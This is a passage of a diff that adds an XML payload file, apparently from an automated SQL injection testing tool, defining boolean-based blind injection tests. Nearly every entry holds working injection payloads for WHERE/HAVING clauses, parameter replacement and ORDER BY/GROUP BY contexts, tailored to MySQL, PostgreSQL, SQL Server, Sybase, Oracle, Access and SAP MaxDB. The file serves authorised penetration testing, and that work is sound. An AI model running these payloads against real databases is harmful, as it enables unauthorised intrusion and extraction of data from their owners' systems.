+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>%16</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>%16</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
+        <request>
+            <payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
+        </request>
+        <response>
+            <comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR MAKE_SET([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ELT([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR ELT([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ([INFERENCE])*[RANDNUM]</vector>
+        <request>
+            <payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+        </request>
+        <response>
+            <comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR ([INFERENCE])*[RANDNUM]</vector>
+        <request>
+            <payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+        </request>
+        <response>
+            <comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
+
+    <!-- Boolean-based blind tests - Parameter replace -->
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>MAKE_SET([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
+        <request>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
+        </request>
+        <response>
+            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (ELT)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>ELT([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>ELT([INFERENCE],[ORIGVALUE])</vector>
+        <request>
+            <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
+        </request>
+        <response>
+            <comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (bool*int)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>([INFERENCE])*[RANDNUM]</vector>
+        <request>
+            <payload>([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+        </request>
+        <response>
+            <comparison>([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>([INFERENCE])*[ORIGVALUE]</vector>
+        <request>
+            <payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
+        </request>
+        <response>
+            <comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>IIF([INFERENCE],[RANDNUM],1/0)</vector>
+        <request>
+            <payload>IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>
+        </request>
+        <response>
+            <comparison>IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
+        <request>
+            <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
+        </request>
+        <response>
+            <comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
+        <request>
+            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+        <request>
+            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - Parameter replace -->
+
+    <!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!-- It exclusively works with ORDER BY -->
+    <test>
+        <title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <request>
